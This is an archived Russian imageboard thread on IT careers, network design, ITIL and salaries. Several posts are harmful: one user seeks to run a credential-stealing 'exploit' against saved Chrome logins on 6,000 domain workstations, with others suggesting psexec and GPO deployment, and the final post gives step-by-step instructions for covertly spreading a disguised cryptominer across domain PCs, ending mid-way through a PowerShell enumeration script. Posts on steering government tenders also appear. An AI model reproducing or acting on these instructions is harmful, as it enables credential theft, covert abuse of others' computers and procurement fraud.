24 декабря Архивач восстановлен после серьёзной аварии. К сожалению, значительная часть сохранённых изображений и видео была потеряна. Подробности случившегося. Мы призываем всех неравнодушных помочь нам с восстановлением утраченного контента!
Если у вас есть предложения по треду/шапке, ответьте комментом на этот пост. Ликуйте интересные обсуждения комментом в этот пост.
Начинающие! Если не хотите сидеть вечно на дне, то учите одно конкретное направление. Учить - это значит ебашить курсы и лабораторные по три-восемь часов в день каждый день, сдавать сертификационные экзамены, учить английский до беглого разговорного на IT тематику. Будете гонять балду - останетесь на дне.
В России IT нет, с небольшими исключениями ! Запомните это. В России в IT работать можно только в аутсорсерах на зарубежные компании, или в компаниях, которые выпускают IT продукты и сервисы, востребованные на мировом рынке. В остальных компаниях в России бюджеты на IT не большие, качество процессов внутри компании низкое, и это будет серьёзно влиять на ваше развитие.
Не ходите работать эникеями, не теряйте время. Пусть вашим первым опытом работы будет любая IT компания, и сразу идите на конкретную специализацию: линук админ, виндовс админ, сетевик, стораджист (storage admin), сервис деск (service desk) в конце концов. IT компания – это компания, где IT приносит основной доход, а не является обслуживающим подразделением. Провайдер, банк, контора разработчиков ПО - это IT компании. Завод, веб-студия, магазинная сеть – это не IT компании.
Уровень зарплат у состоявшихся квалифицированных специалистов с 8-10 годами опыта в Москве в IT – не менее 140000 руб., в идеале - 180-240 тыс.руб.
Переезжайте в другие города, если в вашем городе нет квалифицированной работы в IT. Меняйте компании легко, если у вас нет развития, не привязывайтесь к работадателям. Вы всегда себе работу найдёте, если у вас высокая квалификация. Подавайтесь на позиции и проходите собеседования по несколько раз в месяц, в том числе с фейковым именем и фейковым резюме. Не ссыте.
Готовьтесь к эмиграции. На всякий случай, не помешает. У вас одна из самых востребованных и гибких профессий. Попробуйте подаваться на вакансии зарубежом, посмотрите условия эмиграции (требования по закону и иммиграционным программам) и условия жизни.
Не тратьте много времени на женщин. Особенно, если они не разделяют ваших профессиональных интересов и тормозят ваше развитие, не дают переехать в другой город, и ебут мозг всяческими способами.
Бросьте игрушки и сериалы. Ибо нехуй. В отпуске поиграете и посмотрите.
Для программистов раздел /pr и тред "Мы вам перезвоним" в нём. Железо в /hw/, софт в /s/.
>Все друзья юристы 300к в секунду, а я все хуй за печенье сосу >Мы тут нищие все, как бичи. Плохо кушаем, сил нет даже перекот сделать >OSPF и BGP просты как палка >И все хотят разговорный английский!
Старые треды: Архив шапки треда и ссылки на треды с 2012 года и до 18.08.2017 - https://pastebin.com/bnfw44ED https://arhivach.org/thread/197078/ - 12.08.2016-30.08.2016 IT-тред #58 (#694827 ресертификация CCNP и CCDA; #695065 техподдержка-кун уволен; #696256 учебные курсы и сертификация VMware VCP) https://arhivach.org/thread/201391/ - 30.08.2016-18.09.2016 IT-тред #59 (#704591 техподдержка-кун устроился на работу #705495, #700375 кто-то страдает по BGP, #701024 порядок поиска справочной информации, #701185 попытка вката в профессию, #704529 куда идти после техподдержки провайдера, #706561 и 716508 - ещё сертификация VMware/network virtualization, #707228 лабы по Red Hat Storage/ceph/gluster, #707418 требования для джуниора сетевика, #708048 перекат из дотера в админы, #712657 собеседование мейл ру куна/сетевик, #713978 миниопросник сетевиков, #716450 что значит "знать Active Directory по-минимуму", #717116 надрочить технический английский) https://arhivach.org/thread/206505/ - 18.09.2016-14.10.2016 IT-тред #60 https://arhivach.org/thread/211561/ - 14.10.2016-03.11.2016 IT-тред #61 (#758298 - дешёвые виртуалки для выполнения лабораторок по vmware esxi/linux/windows) https://arhivach.org/thread/213360/ - 03.11.2016-08.12.2016 IT-тред #62 ANIMU EDITION IT-тред #63 https://2ch.hk/wrk/arch/2017-01-27/res/807705.html, там ничего интересного, кроме техподдержки-куна (будет скопировано ниже) https://arhivach.org/thread/233978/ - 27.01.2017-08.03.2017 IT-тред #64 https://arhivach.org/thread/254730/ - 08.03.2017-17.04.2017 IT-тред #65 (#941909 - как я попал в рабство (тру стори, старая паста), #941464 - дотер-админ и там ниже по тексту интересно по развитию для сетевиков с CCIE-куном, #947098 сбер/сбертех, #949508 собеседование сетевика в Тинькофф банк, #956919 экзамен CCNP Route, #958426 не ходите на говнокурсы, #959679 CCIE унижает учит, #970362 сторадж-админ в треде, #974087 ошибки на интервью, #976694 техподдержка-кун выкарабкивается в админы, так же в треде есть бензоколонка-кун и scom-кун, #996356 собеседование в интегратор на Linux, #998619 тут неплохие рекомендации для начинающего сетевика ниже по треду, в целом тред про техподдержку) https://arhivach.org/thread/262500/ - 17.04.2017-18.05.2017 IT-тред #66 (#1001276 менять ли работу, если есть предложения, но есть совесть и незаконченные проекты на текущей работе) https://arhivach.org/thread/270233/ - 18/05/17-23/07/17 IT-тред #67 (#1043372 скиллы DevOps'а) https://arhivach.org/thread/282577/ - 24/06/17-28/07/17 IT-тред #68 https://arhivach.org/thread/286265/ - 29/07/17 IT-тред #69 (в треде много сетевиков и про зарплаты в IT, #1081068 триал openshift'а, #1086307 190к руб. в 2014м, #1086534 направления развития в системах виртуализации) https://arhivach.org/thread/294287/ - 16/08/17 ИТ-тред №70 (копаем vpn) http://arhivach.org/thread/295697/ - 10/09/17 ИТ-тред №71 http://arhivach.org/thread/308599/ - 08/10/17 ИТ-тред №72 - вкатываемся http://arhivach.org/thread/321536/ - 73 тред, интересно поясняют про сеть #1148119, разбор L3 #1147437 по косточкам
Аноны, два вопроса на который сетевики не дадут ответа, и мне нужны виндузятники и/или ибшники: 1. Пришла анонимка с почтового ящика на яндексе, который уже удалён, как можно хоть что-то узнать об этом почтовом ящике, может IP адрес или ещё что-то 2. Как запустить удалённо программу в домене от УЗ текущего пользователя, есть программа-эксплойд, которая может выцеплять все сохранённые УЗ из хрома, но только из под юзера кому принадлежит этот хром
>>1149959 >psexec Он запускает или от система, или от пользователя которого ты задашь, или от пользователя от которого ты запустил, а надо от текущего залогиненного юзера Сейчас пытаюсь слепить костыль из get-date и пользователя, а затем создать таск с отсрочкой на минуту от этого пользователя
>>1149940 >Хочу админить Линукс. Какой порядок действий? Посмотреть/повторить все с Ютуб канала из шапки и потом просится работать за еду? именно так и сделай. Где-то там ещё была тема с reddit о пути линукс-админа. Вот там тоже полезные вещи.
>>1149970 в этом ещё одна хуйня, тупые юзеры не перезагружают свои компы годами, а удалённо сделать перезагрузку 6 тысяч станций - мне потом очко разорвут, так-то и планируется, но это работает с 1-10 ПК, когда перезагрузка на общем фоне не видна, но если я перезагружу 6к ПК, с удалёнными сессиями, открытыми "важными документами", то сначала все налетят на админов ВСУСа, а те переадресуют их ко мне, так как в секьюрити евентах будет висеть моя УЗ, которая посылала всем команду перезагрузки
И еще: >>1149962 >а надо от текущего залогиненного юзера >от пользователя которого ты задашь Не вижу противоречий. Если целевой компьютер не сервер терминалов и на нем, соответственно, не разрешены множественные одновременные активные сеансы, то - Разве программа, запущенная от имени пользователя [email protected] на компьютере, за которым в данный момент работает Алиса под именем мистера Сандерса своей учетной записью [email protected], будет выполняться не в текущем, а в отдельном сеансе пользователя [email protected]?
Последние пару дней в дс, все дела командировочные сделал. Делать особо нехуй сижу думаю куда сходить. Жалко анон начальник сетевиков так и не ответил. Лан значит не судьба.
>>1149983 psexec -u [email protected] -p BobIsFaggot!!!11 \\PC-NAME my1ittl3xpl0it.exe Запустит от имени Алисы с правами Алисы? Получит доступ к хранилищу Алисы? Ах да, пароль надо знать, а администратор домена может и не знать пароль пользователя. Но может сбросить. Создать ситуацию, при которой сброс пароля необходим?
>>1149988 У нас необратимое шифрование пароле в домене, я не могу скинуть пароль на все 10к учёток, говорю же, что надо запустить на 6к станций Кроме того, пока оно через foreach пройдёт первую сотню юзеры уже вернут свои пароли
>>1149990 Я вот не помню, приложение, назначенное к развертыванию в GPO на пользователя - оно только при логоне устанавливается, или может фоном в течение сеанса? Если да, то в MSI запихнуть и раздать.
>>1149991 Я последний раз пробовал деплоить так антивирус, оно делалось при логоне, и вангую, что он явно не деплоит от курент юзера, так как у юзера прав не хватит
>>1149995 Я последний раз так разворачивал навязанный сверху чатик. Был у этой конторы жаббер, всех устраивал, денег не просил, с АДом интегрировался - нет, понадобилось покупать этот. Всем всего хватало. Нет, не администраторы. Чятик раздавался в ветке политики пользователя. А вот когда - этого я уже не помню, да и не видел ни разу.
>>1149997 >в ветке политики пользователя И тут нюанс такой. Установка-то, конечно, идет от системного пользователя, и чятик ставился не по десятку экземпляров на каждую жестянку, в каждый профиль. Но запускался-то потом в контексте пользователя. А вот если раздавать не "На пользователя" а "На компьютер", то после установки ничего не происходило.
Господа сетевики. Я опять со своей резервной площадкой (ДЦ2) выхожу на связь. Предлагаю обсудить дизайн резервной площадки в сети энтерпрайза. Пикрелейтед. На данный момент есть ДЦ1, открывается ДЦ2. Из костылей: Нам придется растянуть кластер межсетевых экранов на два ДЦ. Две ноды кластера будет в ДЦ1 и две ноды в ДЦ2. И также собрать два vPC домена в Back-to-Back vPC через темную оптику. Тоже самое и с роутерами, на которых вертится BGP и анонсиреют наши PI во внешний мир. В итоге логически с точки зрения виртуалок на блейдовых серверах, это будет один ДЦ. И шлюзом для них выступает растянутый кластер межсетевых экранов. А для некоторых виртуалок шлюзом будет выступать HSRP на Nexus-ах. Тоже как бы растянутый на две площадки. Ну и да, конечно же придется растянуть L2 домен на две площадки. Иначе никак. Что скажете, кто-то видит подводные камни? По поводу того, что вируталки из ДЦ2 будут выходить в инет через ДЦ1 — пофиг. Иначе мы сделать не можем ввиду особенностей инфраструктуры.
Задроты, слушайте. Был я, значит, недоайтишником-недоасушником на крупном производственном предприятии. Делал все (не я один) - драйвера к железкам, реализация протоколов обмена всяких, малость автоматизации, малость линукса типа серверов под мелкие задачи, проксей там. Немного питона для работы и джавы для себя. Все околоайтишное говно, короче.
И дернул меня сатана за хуй вызваться на роль нового отдела IT (раньше отдела формально не было). Ну, в принципе, учитывая то, что выкатиться из IT-дна я хотел давно, меня почти все устраивает, работа стала несколько иной - закупки и прочее бюджетирование (4 филиала), договора, какие-то совещания, где IT не при хую вообще. Притом, что я ебашу и всю старую работу - ок, людей мало, я просто делаю больше работы за бОльшие деньги.
Но есть такая неприятная вещь - как ежемесячные планы работ, которые меня угнетают. Я не знаю, что там писать. IT на предприятии - это поддержка текущей инфраструктуры, работы дохуя, но в планы ее не запишешь. А руководство требует развития, типа отдел есть - должны быть и планы.
Хули делать? Я уже откатиться хочу назад. Из минусов делать ту же работу за меньшие деньги.
>>1150068 >работы дохуя, но в планы ее не запишешь Это какая же? А, понял, из разряда "Памахити усе сломалось!!!11". Да, планирование аварийных ситуаций с точным количеством и временем и правда выглядит сомнительно. Следовательно, нужно указывать, мол, реагирование на инциденты по мере необходимости, по заявкам пользователей, по событиям мониторинга, по воле Б-га и ввиду неизбежных на море случайностей.
>>1150076 >реагирование на инциденты И да, установи, правда что, показатели на количество таких инцидентов. И придумай план, как добиться неуклонного улучшения этих показателей, т.е. уменьшения количества инцидентов. О как я могу!
>>1150073 >в новые регистрационные центры Чем старые не устраивали? Где техническое и экономическое обоснование? >Реализация логирования Та-а-а-ак, а до сих пор не было? >внедрение процессной карты выполнения заявок Ты ж понимаешь, что здесь по-хорошему банда аналитиков нужна? Но дерзай, хуле. Если при этом в соответствии с картой заявка будет выполняться три дня вместо часа - пеняй на себя. >поднятие информационного портала для IT отдела В сочетании с предыдущим пунктом обязательно и параллельно. Категоризация и типизация заявок, разбивка на типовые задачи и решения, в случаях, интерактива не требующих - автоматизация решения. >Переход к закупкам оборудования единого вендора ФАС тебе за это жопку а-та-та.
>>1150087 >>в новые регистрационные центры >Чем старые не устраивали? Где техническое и экономическое обоснование? А кто у тебя будет спрашивать, там же ИТ отдел, скажи, что пинг будет короче, буд-то кто-то првоерит >>Реализация логирования >Та-а-а-ак, а до сих пор не было? В единое место, в бесплатный SIEM или дополнить виндовые логи в ГПО >>внедрение процессной карты выполнения заявок >Ты ж понимаешь, что здесь по-хорошему банда аналитиков нужна? Но дерзай, хуле. Если при этом в соответствии с картой заявка будет выполняться три дня вместо часа - пеняй на себя. >>поднятие информационного портала для IT отдела >В сочетании с предыдущим пунктом обязательно и параллельно. Категоризация и типизация заявок, разбивка на типовые задачи и решения, в случаях, интерактива не требующих - автоматизация решения. А зачем тебе делать там сроки, просто описывай процессы, кто проконтролирует как ты выполняешь по карте или без, это идеальный вариант, просто карта, пока без часов, или ставь заведомобольшие, и в следующем году покажешь оптимизацию процесса >>Переход к закупкам оборудования единого вендора >ФАС тебе за это жопку а-та-та. если не гос, то похуй, если ГОС, то: поставщик в чьем названии присутствуют буквы "Л" "Е" "Д" "Л", и никакой фас тебя за жопу не возьмет, у нас все тендеры так работают
>>1149964 Как думаешь, за месяц реально осилить? В железе немного разбираюсь, Арч/генту поставить смогу, домашнюю сеть тоже смогу поднять, консольку уважаю, конфигов не боюсь. Собираюсь увольняться с дно работы после нг так что нужна работа, а айти мне очень нравится.
>>1150090 >поставщик в чьем названии присутствуют Не прокатит. Вот именно так - не прокатит, на сорокматьегочетвертом я собаку съел. А вот по 223, кстати, может. Не все только работают по нему. По 44 немного по-другому делается. Составляется техзадание, хорошее, подробное, с описанием всего, что только можно, избегая по возможности прямых указаний марки и/или торгового наименования ииии... как-то само собой получается, что этому ТЗ отвечает строго определенный товар. Да, расширенная поддержка на определенных условиях (carepack etc.) вряд ли пройдет, нарушается принцип однородности номенклатуры ТРУ: нельзя одним лотом заказывать ТРУ из разных разделов классификатора, в данном случае товар и услугу. Если процедура многолотовая, то можно. Но на разные лоты могут заявиться разные участники, такой нюанс. Но вернемся к нашим баранам. Несколько таких процедур - и мы имеем что-то вроде инфраструктуры, у которой есть определенные совершенно логичные требования к отдельным ее компонентам. И вот теперь можно абсолютно не стесняясь указывать оборудование конкретного производителя. Из соображений совместимости - это законно.
>>1150091 >Как думаешь, за месяц реально осилить? В железе немного разбираюсь, Арч/генту поставить смогу, домашнюю сеть тоже смогу поднять, консольку уважаю, конфигов не боюсь. Собираюсь увольняться с дно работы после нг так что нужна работа, а айти мне очень нравится. За месяц? Вряд ли. Лучше сосредоточиться на Debian или RedHat(CentOS). Должен уметь поставить, поднять разные сервисы (например, DNS, DHCP и тому подобное). Разбираться в Apache, nginx и уметь писать скрипты. За месяц этого не осилить, по-моему.
>>1150090 >А зачем тебе делать там сроки А вот тут ты, кажется, не понял. Я под словами >заявка будет выполняться три дня вместо часа имел в виду несколько другое. Говорят, для любой в принципе решаемой задачи существует более одного рабочего решения, при этом из них не менее одного, которое работает через жопу. Таким образом, можно составить карту процессов таким образом, что заявка, для выполнения которой ранее требовался звонок и полчаса-час работы, теперь будет выполняться три дня, с заполнением собственно заявки, ее согласованием, ебанием, категоризацией, перенаправлением, хуением, элевацией, эскалацией и хуяцией. Но можно и наоборот сделать, когда все красиво, не спорю. Просто первый пример у меня постоянно перед глазами.
>>1150073 >внедрение процессной карты выполнения заявок (itil) Это не работает. Пытались внедрять уже два раза. В конечно итоге забивают хуй как источники заявки, так и исполнители. Хотя это нужно даже для СМК (система менеджмента качества). Чтобы это работало, нужно отключать к хуям телефоны отдела. >поднятие информационного портала для IT отдела (вкики на апач) Никто не будет читать, проще позвонить. В конечном итоге ИТИЛ выльется в увеличение времени решения проблемы. А вот сократит ли количество завок в будущем - хз.
>>1150105 >Чтобы это работало, нужно отключать к хуям телефоны отдела. Либо посадить хотя бы одного двух человек на прием заявок. При этом тикеты должны создаваться автоматически при поступлении входящего звонка на определенный номер.
>>1150105 >Это не работает. Пытались внедрять уже два раза Ну это значит, что ты не работал в нормальном сервис деске >>1150115 ага
Суть в том, чтобы делать линии обороны: От много людей с малой квалификации на обезьяний труд до супер спецов, пример
Первая линия (приём и эскалация заявок, простейшие решения уровня перезагрузите) Вторая линия (сетевики без сертификатов, которые перезагружают интерфейс, могут назначить ИП адрес, пару виндовс макак с делегированными правами в АД, чтобы добавлять группы) Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка)
По ITIL:
У тебя есть ВХОДНЫЕ ДАННЫЕ > Процесс (с вечной оптимизацией по SLA и KPI+KGI) > выход все стандартные процессы, которые имеют свойство повторения больше 3-5 раз должны быть описаны и найден кратчайший путь выполнения, например
ВХОД: НУЖЕН ПРЕДОСТАВИТЬ ДОСТУП К ПОЧТЕ ДЛЯ ЧТЕНИЯ ЧУЖОГО ЯЩИКА ПРОЦЕСС: ЭСКАЛИРОВАНИЕ НА СОГЛАСОВАНИЕ РУКОВОДИТЕЛЯ/ДИРЕКТОРА -> ПЕРЕНОС НА ГРУППУ АДМИНОВ -> ВЫПОЛНЕНИЕ ВЫХОД: РЕЗУЛЬТАТ
Оптимизация, пример: отказаться от согласования для почты сотрудников ниже 5 грейда (ниже чем главные по тарелочкам)
>>1150132 >Вторая линия (сетевики без сертификатов, которые перезагружают интерфейс, могут назначить ИП адрес, пару виндовс макак с делегированными правами в АД, чтобы добавлять группы) Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка) Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями
>>1150138 >Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями В Infosystem JET, правда я там пара лет как уже не работаю
>>1150153 >В Infosystem JET, правда я там пара лет как уже не работаю По подробнее. Как-то метил туда. Ну и в другие интеграторы. Мне всегда казалось, что я там буду писать эти всяческие ПЗ, ТКП и другие аббревиатуры в большей степени, а не сетями заниматься. Документацией, короче говоря.
Да и денег мало платят. Меньше, чем в среднем энтерпрайзе. Думаю сейчас 90-100 на руки в Джете — стандарт. А то и меньше. И в серую.
>>1150153 >правда я там пара лет как уже не работаю и почему ушел? И куда? В дургой интегратор или как? И если н5е в интегратор, то почему не в интегратор.
>>1150156 >умаю сейчас 90-100 на руки в Джете Друг там CCNA у него 90к, сейчас вся ЗП белая, ещё в 2013 сделали белой, хотя ты прав, ниже чем по рынку, но нивелируют прочими плюхами: 3 дня в месяц без объяснения и справок (у нас все не ходили по пятницам, пидоры), свой врач и массажист, раньше был ДМС, премии, любая переработка = 1% от зп в час, то есть отработал в выходные смену 12 часов, получил 100% зп + 12% за один день, я когда работал брал себе все субботы, получал по 36-48% сверху. Когда я был не смотрели на опоздания, как пришёл, так пришёл, как ушёл так и ушёл, но работу делай
>>1150157 Ушёл в небольшую контору начальником ИТ отдела, так как из техпода предложили делать в одной фирме с ноля и сразу начальником, и не жалею, опыта получил очень много причём не только манагерского, получил хорошие знакомства у разных вендоров взяточки, откатики с партнёрскими программами и скидками, короче не жалею
Посоветуйте, например. Отучился в вузике на инженера-системотехника, после 3 года работал на заводе инженером хуйни. Сейчас планирую опять вкатиться в ИТ по специальности: системным аналитиком или аналитиком данных, sql или что-то подобное. Что чаще спрашивают на собеседовании? Что подучить? Куда посоветуете идти?
>>1150163 >Друг там CCNA у него 90к что значит CCNA в данном контексте. Я, наприме, CCNP. Но ты же понимаешь, что можно быть CCNP и даже CCIE, но ничерта не знать. А можно вообще не сдавать на сертификаты, но быть гуру.
>>1150163 И да, это отдел какой? Там есть сервисный центр, есть какие-то проектанты, не помню уже как называется. Сетевики там отдельно. Те, кто серверами занимается, тоже отдельно. Не помню уже аббпревиатуры.
>>1150168 > CCNP и даже CCIE, но ничерта не знать Кстати, не видел таких, это которые дампают вопросы или пользуются багом сворачивания вопросов? Просто помню видео было такое, когда какой-то хуй сворачивает вопросы и смотрит ответы в интернете прямо на экзамене Друг занимается уже готовой сетью, которое построило более высокое подразделение, сейчас, насколько я знаю, занимается и изменениями, но первоначальная сеть была не его Насколько знаю На уровнях агрегации и доступа, про ядро не уверен. Вот ребята которые строили сеть и более высокие сетевики, кстати там был парень с реальным знанием CCNP и даже без CCNA, но был в огромном почёте, занимаются только ядром и агрегацией до уровня доступа они уже не опускались почти никогда, и занимались проектированием сетей и подобными делами, хотя я был виндузовым админом и особо не лез в их работу
>>1150171 бля, я этого тоже не помню, это было сто лет назад, мы звали их сетевики, просто "кинь на сетевиков" и всё, они и в СД были как "сетевые инженеры" и что-то такое
>>1150179 >с реальным знанием CCNP и даже без CCNA, но был в огромном почёте >занимаются только ядром и агрегацией Почему все дрочат на CCNP, это же изи выучить и сдать. С дампами так вообще за пару месяцев решается. Охуеть ядро и агрегация. Чего там есть сложного вообще? Если это не провайдер, то это работа для джамшута.
>>1150293 Речь идёт о уровне знаний, те кто знаком с сертификацией сразу понимают о каком уровне идёт речь. Есть сертификат или нет без разницы. Просто это такой разговорный уровень для общения. Я например считаю что я близок к этому уровню знаний, а сдавать не хочу, жду когда они трек обновят.
>>1150293 > >Почему все дрочат на CCNP, это же изи выучить и сдать. Никто не дрочит на CCNP. Более того, на CCIE никто тоже не дрочит. Когда говорят CCAN|NP|IE, имеют ввиду тот перечень навыков, знаний и опыт работы, который предполагается знать человеку с соответствующим сертификатом. Имеют ввиду "знания на уровне..."
>>1150293 А насчет ядра и агрегации согласен. Работа для джамшута. Как и всё админство. Sad but true. То ИТ, которым действительно надо заниматься, не имеет ничего общего с администрированием, веб-макакингом и кодингом.
>>1150293 > Охуеть ядро и агрегация Ну под ядром в крупной компании подразумевается не администрирование коммутаторов ядра, а вся центральная инфраструктура. Всё то железо, на которое завязаны все сервисы компании. Например, под этим подразумевается знание того, как и почему стек коммутаторов 4500-Х подключен к площадке Х, как и зачем подключены роутеры, которые терминируют туннели филиалов, партнеров и черт еще чего. Коммутации ЦОДа компании тоже относиться к т.н. "ядру" я бы сказал. А само ядро кампусной сети....ну тут да, действительно. Но картина в целом выглядит уже сложнее.
Расскажите про Ланит, что из себя представляет, каково работать там, как платят. Также интересует GDC в Казани который, в инторнете про них хорошего мало пишут.
>>1150319 >Всё то железо, на которое завязаны все сервисы компании >как и зачем подключены роутеры, которые терминируют туннели филиалов В розетку подключены, чтобы нагревать воздух. Тунели уже школьники с компов делают безо всяких кошек.
На сетевое железо сервисы обычно завязаны примерно как на электросеть. В компаниях до 1000 рабочих мест можно всё выкинуть и заново настроить за 24 часа силами одного двух макак. Если компания большая, то макак нужно больше. Откуда ЗП по 100к у сетевых инженеров я не понимаю.
>>1150394 я в ДС. Инженер в нефтегазовой компании от 140 тр Разработчик с опытом от 120 тр. Хороший годный сетевик с опытом работы в крупной конторе уровня топ-20 банков/ритейл контор это примерно 100 на руки. За 120 можно найти, но придется поискать. За сотку прям устроишься без проблем. Это на руки. Совокупный доход любого хорошего специалиста в ДС это сотка в месяц полюбому.
>>1150401 Все у вас там в ДС заебись кроме аренды.. Понту нет на 120 ехать, даже на 150 так себе, тк если тебе 150 платят и ты готов ехать, то чего бы не свинтить за бугор ?
то есть сетевики зарабатывают примерно как и все остальные на тех специальностях, на которых нужна какая-то квалификация. Уровень 60-80 тр на руки в ДС это админы рабочих станций, компьютерная помощь, всякие продаваны телефонов и тому подобное. То есть те работы, где можно относительно легко обучить почти любого за приемлемый срок.
>>1150404 кому ты там за бугром нужен — русский Ваня — без гражданства, языка и опыта работы?! Ты что думаешь там своих что ли нет сетевиков/кодеров/админов/любая другая профессия? Если ты талант и самородок — это одно! Но таким у нас тоже сладко живется. В яндексах датамайнингом каким-нибудь за 200к заниматься.
>>1150401 >Инженер в нефтегазовой компании от 140 тр Сколько у нас нефтегазовых компаний? В газпроме, ты хотел сказать? >в крупной конторе уровня топ-20 банков/ритейл контор это примерно 100 на руки В РФ 300+ CCIE. Это по 10 на топ20 банков и ритейл контор. А ещё есть 9000+ CCNP и все они получают 100+. 100к даже для ДС не "обычная зп".
>>1150411 Не, не газпром. Новатэк. Это газовая контора. Инженер-проектировщик опытный 150-200к. Лично общался с HR. Но это выпускники ТОп ВУЗа РГУ Нефти и Газа с богатым опытом.
Еще есть вендоры и интеграторы. Там платят побольше, чем 100. Но там уже за администрирование, а за пресейл, проектирование и тома подобное.
>>1150411 Кстати, насчет зарплат. Есть же еще всякие PwC, KPMG, инвестбанкинг или как его там. Где трудятся успешные выпускники МГУ, ВШЭ и других ВУЗов из ТОП-5. Всякие консультанты BI и прочей другой херни. Там там вообще поржали бы над зарплатой в 100к. Там 100к платят стажеру. Правда хер попадешь туда и работать надо. Это не циски настраивать и групповые политики пердолить
Вштал тут вопрош про покупку ажно целой AS для нашей компании. Я уж не знаю, чем там руководствовались топы, суть короче в том, что реализовывать всё это в конечном итоге будет Вася из ИТ. То есть я. Собственно, мне нужны аргументы против регистрации AS. Структура межсайтовых связей - классическая звезда VPN с ЦО в центре и филиалами/ЦОДами на лучах. По договору с разными провайдерами на каждый линк в интернет. До этого я с BGP никогда не работал, всё пидорение сетей ограничивалось нашей внутренней AS на OSPF. Когда таки покурил пару недель различные статьи по теме понял, что так нихуя и не понял, как будут анонсироваться в интернеты линки от филиалов. Если в OSPF можно указать, что такая-то /30 подсеть из сети /28 будет анонсироваться туда-то, а другая /30 подсеть туда анонсироваться не будет. В BGP же, как я понял, анонсы во внешний мир хуярятся сразу с минимальным префиксом /24 и при том одновременно со всех наших шлюзов ведущих в Интернет. /tl;dr/ Наверно криво объясняю, так как с терминологией не освоился ещё, да и понимание предметной области пока мутное. Короч, что я имею ввиду: Допустим, есть у нас ЦО в Москве и филиал Чите. Их шлюзам присвоены адреса из одного и того же блока одной и той же BGP AS, к примеру, 2.2.2.0/24. У Москвы 2.2.2.1, у Читы 2.2.2.200. LAN ЦО и филиала связаны через VPN по общедоступным каналам связи; никакой своей кабельной сети между филиалом и ЦО нет. Ну и вот, допустим, какой-то клиент из Читы решает получить доступ к официальному сайту компании, который хостится по московскому адресу 2.2.2.1. Как пойдёт пакет? Из того, что я понял, он придёт в сеть провайдера, там провайдер увидит, что данный IP пункта назначения относится к известной BGP AS, посмотрит в таблицу маршрутизации, и увидит, что ближайший к нему шлюз в эту AS находится по адресу 2.2.2.200, после чего смаршрутизирует туда пакет и... всё пойдёт прахом, потому что своей собственной кабельной структуры у нашей компании нет, а VPN быть может вообще не настроен на то, чтобы перенаправлять такую-то хуйню о внешние интернеты. Ну или там стоит сраный ЛинкСис, который вообще охуеет с такого напора. Или я не прав? /tl;dr Х2/ Как, короче, отдельно анонсировать префиксы /30 или /32, входящие в выделенную нам подсеть, чтобы при этом на нас весь мир не орал матом, дескать, какого хуя вы раздуваете Full View?
>>1150347 GDC, или по-татарски Айсиэл сервисез, это галера. Будешь на аутсорсе обслуживать европейских заказчиков. Зарплаты средние для замкадья, причем в других подразделениях ICL (типа СТ) за те же знания и опыт можно получать больше.
>>1150443 Я что-то не понял зачем тебе в филиалах компании твои провайдеронезависимые адреса? У нас BGP с цоде, анонсируем свои PI на двух провайдеров. Все просто, схема стандартная, настройка базовая. Ничего сложного нет. Гугли BGP для двух провайдеров, мануалов куча.
Если просят проголосовать организацию на каком-нибудь сайте получается проголосовать единожды. Я ж правильно понимаю, что там проверка айпишника и невозможно сделать так чтобы каждый сотрудник проголосовал с рабочего места?
>>1150521 >проверка айпишника Ничего это не значит, может быть он записывает результат по куки, а не по IP, как люди с серыми IP голосуют, а 1 голос по IP - это безумие
>>1150523 Ну я просто столкнулся с такой проблемой, что не могут люди из нашей сети голосовать. Один проголосовал, а всем другим пишут, что вы уже проголосовали - хватит. Могу я как-то это разрешить? >по куки Дык я бы тогда мог куки стереть и ещё голосовать. Почему тогда другим компам в сети запрещает?
У меня вот вопрос. Вам удается читать литературу на работе?Или дома?И нормально ли у вас усваивается инфа если по сути приходишь домой в 7-7-30,до 8 ужинаешь а потом до 10 занимаешься?
>>1150526 >У меня вот вопрос. Вам удается читать литературу на работе? только на работе этим занимаюсь, дома редко. На работе всеглда есть время на чтение литературы и проделывания всяких лаб в EVE-NG
>>1150529 Я пытаюсь что-то делать по вечерам,но голове уже тяжело после рабочего дня.На работе к сожалению времени нет. Надеюсь когда-нибудь появится такая работа с возможностью уделять хотя бы полтора часа в день на самообразование.
>>1150526 > У меня вот вопрос. Вам удается читать литературу на работе?Или дома?И нормально ли у вас усваивается инфа если по сути приходишь домой в 7-7-30,до 8 ужинаешь а потом до 10 занимаешься? Попытки заниматься этим дома после работы длительное время быстро проведут тебя к проф выгоранию.
Как можно с минимумом затрат сделать переадресацию с одного телефона на другой? Телефоны обычные аналоговые и функции они такой не поддерживают. Линии разные.
Сетевики, а как мой провайдер организует работу интернета у меня дома, у меня нет привязки по маку, пппое, или ещё какой говнины, я просто втыкаю провод и получаю интернет с белым IP по DHCP от провайдера
Катал это всё для /cc/, о том как заразить ПК в домене майнером, что бы не зря катал вброшу сюда, может кому-то понадобится:
1 качаешь консольный майнер майнергейта, его так как не детектируется антивирусом: https://minergate.com/downloads/console 2. переименовываешь его .exe в что-то более-менее похожее на процесс винды, например system86 3. создаешь батник загрузки майнера и пишешь туда: "system86 -user youremail@account -xmr 1", где -xmr, то что майним, цифра "1" - потоки процессора, ты сказал про 80%, вот если у тебя 4 ядра, то бери цифру 3, ну сам подгонишь system86 -имя твоего переименованного exe файла 4. чтобы не палиться качаешь прогу, называется bat to exe, и конверитурешь свой bat в СКРЫТЫЙ exe файл без ГУИ 5. создаёшь ярлык для автозапуска файла при старте системы, назови его также system86.lnk, в нём указывай путь на скрытый ехе "C:\ProgramData\system86\test.exe" 6. создаём сетевую папку с правами "чтение для всех", папка будет, например "\\SMBshara\miner\"и кидаем туда наш ярлык и папку с майнером 7. Я уже постарался и сделал скрипт для разливки на ПК в домене: #начало мы выгружаем все ПК из OU $ErrorActionPreference = "SilentlyContinue" $strCategory = "computer" $objDomain = New-Object System.DirectoryServices.DirectoryEntry $objSearcher = New-Object System.DirectoryServices.DirectorySearcher $objSearcher.SearchRoot = "LDAP://OU=SERVERS,DC=COMPANY,DC=local" $objSearcher.Filter = ("(objectCategory=$strCategory)") $colProplist = "name" foreach ($i in 